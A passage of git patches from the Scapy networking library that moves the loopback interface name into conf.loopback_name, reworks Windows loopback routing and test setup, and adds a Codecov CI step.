'description': "[Unknown] %s" % name, + 'pcap_name': pcap_name, + 'description': name, 'win_index': index, 'guid': guid, 'invalid': False, - 'mac': 'ff:ff:ff:ff:ff:ff', + 'mac': '00:00:00:00:00:00', 'ipv4_metric': 0, 'ipv6_metric': 0, - 'ips': [] + 'ips': ips, + 'flags': flags } - # No KeyError will happen here, as we get it from cache - self.data[guid] = NetworkInterface(dummy_data) + # No KeyError will happen here, as we get it from cache + self.data[guid] = NetworkInterface(data) def dev_from_name(self, name): """Return the first pcap device name for a given Windows @@ -708,9 +711,7 @@ def dev_from_index(self, if_index): if iface.win_index == if_index) except (StopIteration, RuntimeError): if str(if_index) == "1": - # Test if the loopback interface is set up - if isinstance(scapy.consts.LOOPBACK_INTERFACE, NetworkInterface): # noqa: E501 - return scapy.consts.LOOPBACK_INTERFACE + return IFACES.dev_from_pcapname(conf.loopback_name) raise ValueError("Unknown network interface index %r" % if_index) def reload(self): @@ -739,9 +740,13 @@ def show(self, resolve_mac=True, print_result=True): str(dev.description) ) index = str(dev.win_index) - res.append((index, description, str(dev.ip), mac)) + res.append((index, description, str(dev.ip), str(dev.ip6), mac)) - res = pretty_list(res, [("INDEX", "IFACE", "IP", "MAC")], sortBy=2) + res = pretty_list( + res, + [("INDEX", "IFACE", "IPv4", "IPv6", "MAC")], + sortBy=2 + ) if print_result: print(res) else: @@ -833,7 +838,7 @@ def _extract_ip(obj): # Build route try: iface = dev_from_index(ifIndex) - if iface.ip == "0.0.0.0": + if not iface.ip or iface.ip == "0.0.0.0": continue except ValueError: continue @@ -876,7 +881,7 @@ def _extract_ip_netmask(obj): # Build route try: iface = dev_from_index(ifIndex) - if iface.ip == "0.0.0.0": + if not iface.ip or iface.ip == "0.0.0.0": continue except ValueError: continue @@ -898,8 +903,9 @@ def read_routes(): if WINDOWS_XP: routes = _read_routes_c_v1() else: - routes = _read_routes_c(False) + routes = _read_routes_c(ipv6=False) except Exception as e: + raise warning("Error building scapy IPv4 routing table : %s", e) else: if not routes: @@ -924,14 +930,14 @@ def in6_getifaddr(): scope = in6_getscope(ip) ifaddrs.append((ip, scope, iface)) # Appends Npcap loopback if available - if conf.use_npcap and scapy.consts.LOOPBACK_INTERFACE: - ifaddrs.append(("::1", 0, scapy.consts.LOOPBACK_INTERFACE)) + if conf.use_npcap and conf.loopback_name: + ifaddrs.append(("::1", 0, conf.loopback_name)) return ifaddrs def _append_route6(routes, dpref, dp, nh, iface, lifaddr, metric): cset = [] # candidate set (possible source addresses) - if iface.name == scapy.consts.LOOPBACK_NAME: + if iface.name == conf.loopback_name: if dpref == '::': return cset = ['::1'] @@ -963,8 +969,8 @@ def get_working_if(): iface = min(conf.route.routes, key=lambda x: x[1])[3] except ValueError: # no route - iface = scapy.consts.LOOPBACK_INTERFACE - if iface.is_invalid(): + iface = conf.loopback_name + if isinstance(iface, NetworkInterface) and iface.is_invalid(): # Backup mode: try them all for iface in six.itervalues(IFACES): if not iface.is_invalid(): @@ -974,14 +980,14 @@ def get_working_if(): def _get_valid_guid(): - if scapy.consts.LOOPBACK_INTERFACE: - return scapy.consts.LOOPBACK_INTERFACE.guid + if conf.loopback_name: + return conf.loopback_name.guid else: return next((i.guid for i in six.itervalues(IFACES) if not i.is_invalid()), None) -def route_add_loopback(routes=None, ipv6=False, iflist=None): +def _route_add_loopback(routes=None, ipv6=False, iflist=None): """Add a route to 127.0.0.1 and ::1 to simplify unit tests on Windows""" if not WINDOWS: warning("Not available") @@ -995,7 +1001,8 @@ def route_add_loopback(routes=None, ipv6=False, iflist=None): if not conf.route.routes: return data = { - 'name': scapy.consts.LOOPBACK_NAME, + 'name': conf.loopback_name, + 'pcap_name': "\\Device\\NPF_{0XX00000-X000-0X0X-X00X-00XXXX000XXX}", 'description': "Loopback", 'win_index': -1, 'guid': "{0XX00000-X000-0X0X-X00X-00XXXX000XXX}", @@ -1003,30 +1010,27 @@ def route_add_loopback(routes=None, ipv6=False, iflist=None): 'mac': '00:00:00:00:00:00', 'ipv4_metric': 0, 'ipv6_metric': 0, - 'ips': ["127.0.0.1", "::"] + 'ips': ["127.0.0.1", "::"], + 'flags': 0 } - adapter = NetworkInterface() - adapter.pcap_name = "\\Device\\NPF_{0XX00000-X000-0X0X-X00X-00XXXX000XXX}" - adapter.update(data) - adapter.invalid = False - adapter.ip = "127.0.0.1" + adapter = NetworkInterface(data) if iflist: iflist.append(adapter.pcap_name) return - # Remove all LOOPBACK_NAME routes + # Remove all conf.loopback_name routes for route in list(conf.route.routes): iface = route[3] - if iface.name == scapy.consts.LOOPBACK_NAME: + if iface.pcap_name == conf.loopback_name: conf.route.routes.remove(route) - # Remove LOOPBACK_NAME interface + # Remove conf.loopback_name interface for devname, iface in list(IFACES.items()): - if iface.name == scapy.consts.LOOPBACK_NAME: + if iface.pcap_name == conf.loopback_name: IFACES.pop(devname) # Inject interface IFACES["{0XX00000-X000-0X0X-X00X-00XXXX000XXX}"] = adapter - scapy.consts.LOOPBACK_INTERFACE = adapter + conf.loopback_name = adapter.pcap_name if isinstance(conf.iface, NetworkInterface): - if conf.iface.name == scapy.consts.LOOPBACK_NAME: + if conf.iface.pcap_name == conf.loopback_name: conf.iface = adapter conf.netcache.arp_cache["127.0.0.1"] = "ff:ff:ff:ff:ff:ff" conf.netcache.in6_neighbor["::1"] = "ff:ff:ff:ff:ff:ff" diff --git a/scapy/automaton.py b/scapy/automaton.py index d02330e0c7a..db56847c9a2 100644 --- a/scapy/automaton.py +++ b/scapy/automaton.py @@ -860,8 +860,10 @@ def _do_control(self, ready, *args, **kargs): self.debug(3, "Stopping control thread (tid=%i)" % self.threadid) self.threadid = None # Close sockets - self.listen_sock.close() - self.send_sock.close() + if self.listen_sock: + self.listen_sock.close() + if self.send_sock: + self.send_sock.close() def _do_iter(self): while True: diff --git a/scapy/config.py b/scapy/config.py index 0ac21a2290c..d4fe6b7a184 100755 --- a/scapy/config.py +++ b/scapy/config.py @@ -642,6 +642,7 @@ class Conf(ConfClass): #: When True, raise exception if no dst MAC found otherwise broadcast. #: Default is False. raise_no_dst_mac = False + loopback_name = "lo" if LINUX else "lo0" def __getattr__(self, attr): # Those are loaded on runtime to avoid import loops diff --git a/scapy/consts.py b/scapy/consts.py index 952d34ed057..9b046e4d27a 100644 --- a/scapy/consts.py +++ b/scapy/consts.py @@ -3,7 +3,6 @@ # Copyright (C) Philippe Biondi # This program is published under a GPLv2 license -import os from sys import platform, maxsize import platform as platform_lib @@ -18,18 +17,4 @@ BSD = DARWIN or FREEBSD or OPENBSD or NETBSD # See https://docs.python.org/3/library/platform.html#cross-platform IS_64BITS = maxsize > 2**32 - -if WINDOWS: - try: - if float(platform_lib.release()) >= 8.1: - LOOPBACK_NAME = "Microsoft KM-TEST Loopback Adapter" - else: - LOOPBACK_NAME = "Microsoft Loopback Adapter" - except ValueError: - LOOPBACK_NAME = "Microsoft Loopback Adapter" - # Will be different on Windows - LOOPBACK_INTERFACE = None -else: - uname = os.uname() - LOOPBACK_NAME = "lo" if LINUX else "lo0" - LOOPBACK_INTERFACE = LOOPBACK_NAME +# LOOPBACK_NAME moved to conf.loopback_name diff --git a/scapy/layers/inet6.py b/scapy/layers/inet6.py index 0cef7870148..4300e520e6f 100644 --- a/scapy/layers/inet6.py +++ b/scapy/layers/inet6.py @@ -37,7 +37,6 @@ from scapy.base_classes import Gen from scapy.compat import chb, orb, raw, plain_str, bytes_encode from scapy.config import conf -import scapy.consts from scapy.data import DLT_IPV6, DLT_RAW, DLT_RAW_ALT, ETHER_ANY, ETH_P_IPV6, \ MTU from scapy.error import warning @@ -71,7 +70,7 @@ if conf.route6 is None: # unused import, only to initialize conf.route6 - import scapy.route6 + import scapy.route6 # noqa: F401 ########################## # Neighbor cache stuff # @@ -126,7 +125,7 @@ def getmacbyip6(ip6, chainCC=0): iff, a, nh = conf.route6.route(ip6) - if iff == scapy.consts.LOOPBACK_INTERFACE: + if iff == conf.loopback_name: return "ff:ff:ff:ff:ff:ff" if nh != '::': diff --git a/scapy/layers/l2.py b/scapy/layers/l2.py index 29e1f5d736f..3738060878d 100644 --- a/scapy/layers/l2.py +++ b/scapy/layers/l2.py @@ -79,7 +79,7 @@ def getmacbyip(ip, chainCC=0): if (tmp[0] & 0xf0) == 0xe0: # mcast @ return "01:00:5e:%.2x:%.2x:%.2x" % (tmp[1] & 0x7f, tmp[2], tmp[3]) iff, _, gw = conf.route.route(ip) - if ((iff == consts.LOOPBACK_INTERFACE) or (ip == conf.route.get_if_bcast(iff))): # noqa: E501 + if ((iff == conf.loopback_name) or (ip == conf.route.get_if_bcast(iff))): # noqa: E501 return "ff:ff:ff:ff:ff:ff" if gw != "0.0.0.0": ip = gw diff --git a/scapy/route.py b/scapy/route.py index 8fd043604d2..a0e28122257 100644 --- a/scapy/route.py +++ b/scapy/route.py @@ -160,7 +160,7 @@ def route(self, dst=None, verbose=conf.verb): aa = atol(a) if aa == atol_dst: paths.append( - (0xffffffff, 1, (scapy.consts.LOOPBACK_INTERFACE, a, "0.0.0.0")) # noqa: E501 + (0xffffffff, 1, (conf.loopback_name, a, "0.0.0.0")) # noqa: E501 ) if (atol_dst & m) == (d & m): paths.append((m, me, (i, a, gw))) @@ -168,7 +168,7 @@ def route(self, dst=None, verbose=conf.verb): if not paths: if verbose: warning("No route found (no default route?)") - return scapy.consts.LOOPBACK_INTERFACE, "0.0.0.0", "0.0.0.0" + return conf.loopback_name, "0.0.0.0", "0.0.0.0" # Choose the more specific route # Sort by greatest netmask and use metrics as a tie-breaker paths.sort(key=lambda x: (-x[0], x[1])) @@ -195,10 +195,7 @@ def get_if_bcast(self, iff): iface = conf.route.route(None, verbose=0)[0] -# Warning: scapy.consts.LOOPBACK_INTERFACE must always be used statically, because it # noqa: E501 -# may be changed by scapy/arch/windows during execution - -if getattr(iface, "name", iface) == scapy.consts.LOOPBACK_INTERFACE: +if getattr(iface, "name", iface) == conf.loopback_name: from scapy.arch import get_working_if conf.iface = get_working_if() else: diff --git a/scapy/route6.py b/scapy/route6.py index 2508e411655..1aa46d4ace9 100644 --- a/scapy/route6.py +++ b/scapy/route6.py @@ -16,7 +16,6 @@ from __future__ import absolute_import import socket -import scapy.consts from scapy.config import conf from scapy.utils6 import in6_ptop, in6_cidr2mask, in6_and, \ in6_islladdr, in6_ismlladdr, in6_isincluded, in6_isgladdr, \ @@ -251,7 +250,7 @@ def route(self, dst=None, dev=None, verbose=conf.verb): dev = ll_routes[0][3] else: # Fallback #3 - the loopback - dev = scapy.consts.LOOPBACK_INTERFACE + dev = conf.loopback_name warning("The conf.iface interface (%s) does not support IPv6! " "Using %s instead for routing!" % (conf.iface, dev)) @@ -279,12 +278,12 @@ def route(self, dst=None, dev=None, verbose=conf.verb): if not paths: if dst == "::1": - return (scapy.consts.LOOPBACK_INTERFACE, "::1", "::") + return (conf.loopback_name, "::1", "::") else: if verbose: warning("No route found for IPv6 destination %s " "(no default route?)", dst) - return (scapy.consts.LOOPBACK_INTERFACE, "::", "::") + return (conf.loopback_name, "::", "::") # Sort with longest prefix first then use metrics as a tie-breaker paths.sort(key=lambda x: (-x[0], x[1])) @@ -301,7 +300,7 @@ def route(self, dst=None, dev=None, verbose=conf.verb): if res == []: warning("Found a route for IPv6 destination '%s', but no possible source address.", dst) # noqa: E501 - return (scapy.consts.LOOPBACK_INTERFACE, "::", "::") + return (conf.loopback_name, "::", "::") # Symptom : 2 routes with same weight (our weight is plen) # Solution : diff --git a/scapy/sendrecv.py b/scapy/sendrecv.py index fd2f11da238..6e4e8c60df7 100644 --- a/scapy/sendrecv.py +++ b/scapy/sendrecv.py @@ -310,7 +310,7 @@ def __gen_send(s, x, inter=0, loop=0, count=None, verbose=None, realtime=None, r sent_packets.append(p) n += 1 if verbose: - os.write(1, b".") + os.write(1, ".") time.sleep(inter) if loop < 0: loop += 1 diff --git a/scapy/tools/UTscapy.py b/scapy/tools/UTscapy.py index 8be1aed6cd6..17945cadaaa 100644 --- a/scapy/tools/UTscapy.py +++ b/scapy/tools/UTscapy.py @@ -1012,8 +1012,8 @@ def main(): raise getopt.GetoptError("cannot import [%s]: %s" % (m, e)) if WINDOWS: - from scapy.arch.windows import route_add_loopback - route_add_loopback() + from scapy.arch.windows import _route_add_loopback + _route_add_loopback() # Add SCAPY_ROOT_DIR environment variable, used for tests os.environ['SCAPY_ROOT_DIR'] = os.environ.get("PWD", os.getcwd()) diff --git a/scapy/utils6.py b/scapy/utils6.py index c1c0c83ef13..5dd7b847bf9 100644 --- a/scapy/utils6.py +++ b/scapy/utils6.py @@ -18,7 +18,6 @@ import re from scapy.config import conf -import scapy.consts from scapy.base_classes import Gen from scapy.data import IPV6_ADDR_GLOBAL, IPV6_ADDR_LINKLOCAL, \ IPV6_ADDR_SITELOCAL, IPV6_ADDR_LOOPBACK, IPV6_ADDR_UNICAST,\ @@ -68,7 +67,7 @@ def cset_sort(x, y): cset = (x for x in laddr if x[1] == IPV6_ADDR_SITELOCAL) elif in6_ismaddr(addr): if in6_ismnladdr(addr): - cset = [('::1', 16, scapy.consts.LOOPBACK_INTERFACE)] + cset = [('::1', 16, conf.loopback_name)] elif in6_ismgladdr(addr): cset = (x for x in laddr if x[1] == IPV6_ADDR_GLOBAL) elif in6_ismlladdr(addr): diff --git a/test/bpf.uts b/test/bpf.uts index 4c5a638321b..a0dd954deb5 100644 --- a/test/bpf.uts +++ b/test/bpf.uts @@ -16,9 +16,9 @@ get_if_raw_addr(conf.iface) get_if_raw_hwaddr(conf.iface) -= Get the packed MAC address of LOOPBACK_NAME += Get the packed MAC address of conf.loopback_name -get_if_raw_hwaddr(LOOPBACK_NAME) == (ARPHDR_LOOPBACK, b'\x00'*6) +get_if_raw_hwaddr(conf.loopback_name) == (ARPHDR_LOOPBACK, b'\x00'*6) ############ @@ -176,5 +176,5 @@ s = L3bpfSocket() s.send(IP(dst="8.8.8.8")/ICMP()) s = L3bpfSocket() -s.assigned_interface = LOOPBACK_NAME +s.assigned_interface = conf.loopback_name s.send(IP(dst="8.8.8.8")/ICMP()) diff --git a/test/linux.uts b/test/linux.uts index 36d28f42f46..12f080e80c6 100644 --- a/test/linux.uts +++ b/test/linux.uts @@ -73,7 +73,7 @@ from mock import patch # can't remove the lo device (or its address without causing trouble) - use some pseudo dummy instead -with patch('scapy.consts.LOOPBACK_NAME', 'scapy_lo_x'): +with patch('scapy.arch.linux.conf.loopback_name', 'scapy_lo_x'): routes = read_routes() = catch get_working_if only loopback @@ -81,8 +81,8 @@ with patch('scapy.consts.LOOPBACK_NAME', 'scapy_lo_x'): from mock import patch -with patch('scapy.arch.linux.get_if_list', side_effect=lambda: [LOOPBACK_NAME]): - assert get_working_if() == LOOPBACK_NAME +with patch('scapy.arch.linux.get_if_list', side_effect=lambda: [conf.loopback_name]): + assert get_working_if() == conf.loopback_name = catch loopback device no address assigned ~ linux needs_root @@ -95,13 +95,13 @@ assert(exit_status == 0) exit_status = os.system("ip link set dev scapy_lo up") assert(exit_status == 0) -with patch('scapy.consts.LOOPBACK_NAME', 'scapy_lo'): +with patch('scapy.arch.linux.conf.loopback_name', 'scapy_lo'): routes = read_routes() exit_status = os.system("ip addr add dev scapy_lo 10.10.0.1/24") assert(exit_status == 0) -with patch('scapy.consts.LOOPBACK_NAME', 'scapy_lo'): +with patch('scapy.arch.linux.conf.loopback_name', 'scapy_lo'): routes = read_routes() got_lo_device = False diff --git a/test/regression.uts b/test/regression.uts index 6e8c516654e..40df5a53f63 100644 --- a/test/regression.uts +++ b/test/regression.uts @@ -20,7 +20,7 @@ def expect_exception(e, c): conf IP().src -scapy.consts.LOOPBACK_INTERFACE +conf.loopback_name = Test module version detection ~ conf @@ -173,9 +173,9 @@ def get_dummy_interface(): data["ipv6_metric"] = 1 data["mac"] = "00:00:00:00:00:00" data["ips"] = ["127.0.0.1", "::1"] - dummy_int = NetworkInterface(data) - dummy_int.pcap_name = "\\Device\\NPF_" + data["guid"] - return dummy_int + data["pcap_name"] = "\\Device\\NPF_" + data["guid"] + data["flags"] = 0 + return NetworkInterface(data) else: return "dummy0" @@ -191,7 +191,8 @@ get_if_raw_addr6(conf.iface) routes6 = read_routes6() if WINDOWS: - route_add_loopback(routes6, True) + from scapy.arch.windows import _route_add_loopback + _route_add_loopback(routes6, True) routes6 @@ -204,10 +205,11 @@ routes6 if routes6: iflist = get_if_list() if WINDOWS: - route_add_loopback(ipv6=True, iflist=iflist) + from scapy.arch.windows import _route_add_loopback + _route_add_loopback(ipv6=True, iflist=iflist) if OPENBSD: len(routes6) >= 2 - elif iflist == [LOOPBACK_NAME]: + elif iflist == [conf.loopback_name]: len(routes6) == 1 elif len(iflist) >= 2: len(routes6) >= 1 @@ -215,8 +217,8 @@ if routes6: False else: # IPv6 seems disabled. Force a route to ::1 - conf.route6.routes.append(("::1", 128, "::", LOOPBACK_NAME, ["::1"], 1)) - conf.route6.ipv6_ifaces = set([LOOPBACK_NAME]) + conf.route6.routes.append(("::1", 128, "::", conf.loopback_name, ["::1"], 1)) + conf.route6.ipv6_ifaces = set([conf.loopback_name]) True = Test read_routes6() - check mandatory routes @@ -229,13 +231,13 @@ if len(routes6) > 1 and not WINDOWS: assert sum(1 for r in routes6 if in6_islladdr(r[0]) and r[1] == 128 and r[4] == ["::1"]) >= 1 except: # IPv6 is not available, but we still check the loopback - assert conf.route6.route("::/0") == (scapy.consts.LOOPBACK_NAME, "::", "::") + assert conf.route6.route("::/0") == (conf.loopback_name, "::", "::") assert sum(1 for r in routes6 if r[1] == 128 and r[4] == ["::1"]) >= 1 else: True = Test ifchange() -conf.route6.ifchange(LOOPBACK_NAME, "::1/128") +conf.route6.ifchange(conf.loopback_name, "::1/128") if WINDOWS: conf.netcache.in6_neighbor["::1"] = "ff:ff:ff:ff:ff:ff" # Restore fake cache @@ -4222,13 +4224,16 @@ conf.iface = conf_iface conf.route6.resync() if not len(conf.route6.routes): # IPv6 seems disabled. Force a route to ::1 - conf.route6.routes.append(("::1", 128, "::", LOOPBACK_NAME, ["::1"], 1)) + conf.route6.routes.append(("::1", 128, "::", conf.loopback_name, ["::1"], 1)) True = Route6 - Route6.make_route r6 = Route6() -r6.make_route("2001:db8::1", dev=LOOPBACK_NAME) == ("2001:db8::1", 128, "::", LOOPBACK_NAME, [], 1) +r6.make_route("2001:db8::1", dev=conf.loopback_name) in [ + ("2001:db8::1", 128, "::", conf.loopback_name, [], 1), + ("2001:db8::1", 128, "::", conf.loopback_name, ["::1"], 1) +] len_r6 = len(r6.routes) = Route6 - Route6.add & Route6.delt @@ -4278,7 +4283,8 @@ assert _ICMPv6Error().hashret() == b'' = Windows: reset routes properly if WINDOWS: - route_add_loopback() + from scapy.arch.windows import _route_add_loopback + _route_add_loopback() ############ ############ @@ -7301,6 +7307,7 @@ assert len(conf.temp_files) == tempfile_count tshark(count=1, timeout=3) = Check wireshark() +~ wireshark f = BytesIO() pkt = Ether()/IP()/ICMP() @@ -8840,10 +8847,10 @@ import scapy old_routes = conf.route.routes old_iface = conf.iface -old_loopback = scapy.consts.LOOPBACK_INTERFACE +old_loopback = conf.loopback_name try: conf.iface = 'enp3s0' - scapy.consts.LOOPBACK_INTERFACE = 'lo' + conf.loopback_name = 'lo' conf.route.invalidate_cache() conf.route.routes = [ (4294967295, 4294967295, '0.0.0.0', 'wlan0', '', 281), @@ -8863,7 +8870,7 @@ try: assert conf.route.route("255.255.255.255") == ('enp3s0', '192.168.0.119', '0.0.0.0') assert conf.route.route("*") == ('enp3s0', '192.168.0.119', '192.168.0.254') finally: - scapy.consts.LOOPBACK_INTERFACE = old_loopback + conf.loopback_name = old_loopback conf.iface = old_iface conf.route.routes = old_routes conf.route.invalidate_cache() @@ -8872,11 +8879,11 @@ finally: = Mocked IPv6 routes calls old_iface = conf.iface -old_loopback = scapy.consts.LOOPBACK_INTERFACE +old_loopback = conf.loopback_name try: conf.route6.ipv6_ifaces = set(['enp3s0', 'wlan0', 'lo']) conf.iface = 'enp3s0' - scapy.consts.LOOPBACK_INTERFACE = 'lo' + conf.loopback_name = 'lo' conf.route6.invalidate_cache() conf.route6.routes = [ ('fe80::dd17:1fa6:a123:ab4', 128, '::', 'lo', ['fe80::dd17:1fa6:a123:ab4'], 291), @@ -8896,7 +8903,7 @@ try: assert conf.route6.route("fe80::1") == ('enp3s0', 'fe80::7101:5678:1234:da65', '::') assert conf.route6.route("fe80::1", dev='lo') == ('lo', 'fe80::dd17:1fa6:a123:ab4', '::') finally: - scapy.consts.LOOPBACK_INTERFACE = old_loopback + conf.loopback_name = old_loopback conf.iface = old_iface conf.route6.resync() @@ -8913,7 +8920,8 @@ conf.route6.resync() = Windows: reset routes properly if WINDOWS: - route_add_loopback() + from scapy.arch.windows import _route_add_loopback + _route_add_loopback() ############ ############ From 8381a9418719e6b2dd5d37932dfda06360ea4cfc Mon Sep 17 00:00:00 2001 From: gpotter Date: Sat, 4 Apr 2020 23:52:13 +0200 Subject: [PATCH 0084/1632] Restore codecov on GHCI --- .github/workflows/unittests.yml | 2 ++ test/contrib/geneve.uts | 3 ++- test/contrib/mpls.uts | 3 ++- test/contrib/rtr.uts | 3 ++- test/contrib/tacacs.uts | 3 ++- 5 files changed, 10 insertions(+), 4 deletions(-) diff --git a/.github/workflows/unittests.yml b/.github/workflows/unittests.yml index a1922d6a91c..aecf410ce31 100644 --- a/.github/workflows/unittests.yml +++ b/.github/workflows/unittests.yml @@ -64,3 +64,5 @@ jobs: run: ./.config/ci/install.sh - name: Run Tox run: ./.config/ci/test.sh ${{ matrix.python }} non_root + - name: Codecov + uses: codecov/codecov-action@v1 diff --git a/test/contrib/geneve.uts b/test/contrib/geneve.uts index 41c922c1851..2281af7377a 100644 --- a/test/contrib/geneve.uts +++ b/test/contrib/geneve.uts @@ -7,7 +7,8 @@ = Build & dissect - GENEVE encapsulates Ether if WINDOWS: - route_add_loopback() + from scapy.arch.windows import _route_add_loopback + _route_add_loopback() s = raw(IP()/UDP(sport=10000)/GENEVE()/Ether(dst='00:01:00:11:11:11',src='00:02:00:22:22:22')) assert(s == b'E\x00\x002\x00\x01\x00\x00@\x11|\xb8\x7f\x00\x00\x01\x7f\x00\x00\x01\'\x10\x17\xc1\x00\x1e\x9a\x1c\x00\x00eX\x00\x00\x00\x00\x00\x01\x00\x11\x11\x11\x00\x02\x00"""\x90\x00') diff --git a/test/contrib/mpls.uts b/test/contrib/mpls.uts index 1a38c746925..82cfea54ace 100644 --- a/test/contrib/mpls.uts +++ b/test/contrib/mpls.uts @@ -7,7 +7,8 @@ = Build & dissect - IPv4 if WINDOWS: - route_add_loopback() + from scapy.arch.windows import _route_add_loopback + _route_add_loopback() s = raw(Ether(src="00:01:02:04:05")/MPLS()/IP()) assert(s == b'\xff\xff\xff\xff\xff\xff\x00\x01\x02\x04\x05\x00\x88G\x00\x00\x01\x00E\x00\x00\x14\x00\x01\x00\x00@\x00|\xe7\x7f\x00\x00\x01\x7f\x00\x00\x01') diff --git a/test/contrib/rtr.uts b/test/contrib/rtr.uts index 2a7b78ffd00..f499a7168f9 100644 --- a/test/contrib/rtr.uts +++ b/test/contrib/rtr.uts @@ -2,7 +2,8 @@ from scapy.consts import WINDOWS if WINDOWS: - route_add_loopback() + from scapy.arch.windows import _route_add_loopback + _route_add_loopback() = default instantiation diff --git a/test/contrib/tacacs.uts b/test/contrib/tacacs.uts index 4c4fd0ca803..ee602dc186c 100644 --- a/test/contrib/tacacs.uts +++ b/test/contrib/tacacs.uts @@ -4,7 +4,8 @@ from scapy.consts import WINDOWS if WINDOWS: - route_add_loopback() + from scapy.arch.windows import _route_add_loopback + _route_add_loopback() pkt = IP()/TCP(dport=49)/TacacsHeader() raw(pkt) == b'E\x00\x004\x00\x01\x00\x00@\x06|\xc1\x7f\x00\x00\x01\x7f\x00\x00\x01\x001\x001\x00\x00\x00\x00\x00\x00\x00\x00P\x02 \x00\xd0p\x00\x00\xc0\x01\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00' From ce5935c1202e654d88874f5fbe4c893b17d85fb0 Mon Sep 17 00:00:00 2001 From: gpotter2 Date: Tue, 7 Apr 2020 16:44:13 +0000 Subject: [PATCH 0085/1632] Fix Windows routes mock --- scapy/sendrecv.py | 2 +- scapy/tools/UTscapy.py | 12 ++++++------ test/contrib/geneve.uts | 3 --- test/contrib/mpls.uts | 3 --- test/contrib/rtr.uts | 5 ----- test/contrib/tacacs.uts | 5 ----- 6 files changed, 7 insertions(+), 23 deletions(-) diff --git a/scapy/sendrecv.py b/scapy/sendrecv.py index 6e4e8c60df7..fd2f11da238 100644 --- a/scapy/sendrecv.py +++ b/scapy/sendrecv.py @@ -310,7 +310,7 @@ def __gen_send(s, x, inter=0, loop=0, count=None, verbose=None, realtime=None, r sent_packets.append(p) n += 1 if verbose: - os.write(1, ".") + os.write(1, b".") time.sleep(inter) if loop < 0: loop += 1 diff --git a/scapy/tools/UTscapy.py b/scapy/tools/UTscapy.py index 17945cadaaa..2aeb7264453 100644 --- a/scapy/tools/UTscapy.py +++ b/scapy/tools/UTscapy.py @@ -272,7 +272,6 @@ def parse_config_file(config_path, verb=3): "dump": 0, "docs": 0, "crc": true, - "scapy": "scapy", "preexec": {}, "global_preexec": "", "outputfile": null, @@ -300,7 +299,6 @@ def get_if_exist(key, default): verb=get_if_exist("verb", 3), dump=get_if_exist("dump", 0), crc=get_if_exist("crc", 1), docs=get_if_exist("docs", 0), - scapy=get_if_exist("scapy", "scapy"), preexec=get_if_exist("preexec", {}), global_preexec=get_if_exist("global_preexec", ""), outfile=get_if_exist("outputfile", sys.stdout), @@ -515,6 +513,12 @@ def import_UTscapy_tools(ses): """Adds UTScapy tools directly to a session""" ses["retry_test"] = retry_test ses["Bunch"] = Bunch + if WINDOWS: + from scapy.arch.windows import _route_add_loopback, IFACES + _route_add_loopback() + ses["IFACES"] = IFACES + ses["conf"].route.routes = conf.route.routes + ses["conf"].route6.routes = conf.route6.routes def run_campaign(test_campaign, get_interactive_session, drop_to_interpreter=False, verb=3, ignore_globals=None): # noqa: E501 @@ -1011,10 +1015,6 @@ def main(): except ImportError as e: raise getopt.GetoptError("cannot import [%s]: %s" % (m, e)) - if WINDOWS: - from scapy.arch.windows import _route_add_loopback - _route_add_loopback() - # Add SCAPY_ROOT_DIR environment variable, used for tests os.environ['SCAPY_ROOT_DIR'] = os.environ.get("PWD", os.getcwd()) diff --git a/test/contrib/geneve.uts b/test/contrib/geneve.uts index 2281af7377a..5ed6930ad72 100644 --- a/test/contrib/geneve.uts +++ b/test/contrib/geneve.uts @@ -6,9 +6,6 @@ + GENEVE = Build & dissect - GENEVE encapsulates Ether -if WINDOWS: - from scapy.arch.windows import _route_add_loopback - _route_add_loopback() s = raw(IP()/UDP(sport=10000)/GENEVE()/Ether(dst='00:01:00:11:11:11',src='00:02:00:22:22:22')) assert(s == b'E\x00\x002\x00\x01\x00\x00@\x11|\xb8\x7f\x00\x00\x01\x7f\x00\x00\x01\'\x10\x17\xc1\x00\x1e\x9a\x1c\x00\x00eX\x00\x00\x00\x00\x00\x01\x00\x11\x11\x11\x00\x02\x00"""\x90\x00') diff --git a/test/contrib/mpls.uts b/test/contrib/mpls.uts index 82cfea54ace..1ab695504b7 100644 --- a/test/contrib/mpls.uts +++ b/test/contrib/mpls.uts @@ -6,9 +6,6 @@ + MPLS = Build & dissect - IPv4 -if WINDOWS: - from scapy.arch.windows import _route_add_loopback - _route_add_loopback() s = raw(Ether(src="00:01:02:04:05")/MPLS()/IP()) assert(s == b'\xff\xff\xff\xff\xff\xff\x00\x01\x02\x04\x05\x00\x88G\x00\x00\x01\x00E\x00\x00\x14\x00\x01\x00\x00@\x00|\xe7\x7f\x00\x00\x01\x7f\x00\x00\x01') diff --git a/test/contrib/rtr.uts b/test/contrib/rtr.uts index f499a7168f9..55af4e275fd 100644 --- a/test/contrib/rtr.uts +++ b/test/contrib/rtr.uts @@ -1,10 +1,5 @@ + RTR Serial Notify -from scapy.consts import WINDOWS -if WINDOWS: - from scapy.arch.windows import _route_add_loopback - _route_add_loopback() - = default instantiation pkt = IP()/TCP(dport=323)/RTRSerialNotify() diff --git a/test/contrib/tacacs.uts b/test/contrib/tacacs.uts index ee602dc186c..011e78bf706 100644 --- a/test/contrib/tacacs.uts +++ b/test/contrib/tacacs.uts @@ -2,11 +2,6 @@ = default instantiation -from scapy.consts import WINDOWS -if WINDOWS: - from scapy.arch.windows import _route_add_loopback - _route_add_loopback() - pkt = IP()/TCP(dport=49)/TacacsHeader() raw(pkt) == b'E\x00\x004\x00\x01\x00\x00@\x06|\xc1\x7f\x00\x00\x01\x7f\x00\x00\x01\x001\x001\x00\x00\x00\x00\x00\x00\x00\x00P\x02 \x00\xd0p\x00\x00\xc0\x01\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00' From c981019dab7e7e4105ab7a0c2a43d865f2cd8105 Mon Sep 17 00:00:00 2001 From: Nils Weiss Date: Fri, 10 Apr 2020 14:11:52 +0200 Subject: [PATCH 0086/1632] Revert changes to skip print for ISOTP_KERNEL_MODUL unit tests (#2552) * Change warning of skip print for ISOTP_KERNEL_MODUL unit tests * skip unstable obdscanner tests --- test/contrib/automotive/ecu_am.uts | 6 ++++-- test/contrib/automotive/gm/gmlanutils.uts | 6 ++++-- test/contrib/automotive/obd/scanner.uts | 6 ++++-- test/contrib/automotive/uds_utils.uts | 6 ++++-- test/contrib/isotp.uts | 6 ++++-- test/contrib/isotpscan.uts | 6 ++++-- test/tools/isotpscanner.uts | 7 ++++--- test/tools/obdscanner.uts | 16 ++++++++++++++-- 8 files changed, 42 insertions(+), 17 deletions(-) diff --git a/test/contrib/automotive/ecu_am.uts b/test/contrib/automotive/ecu_am.uts index 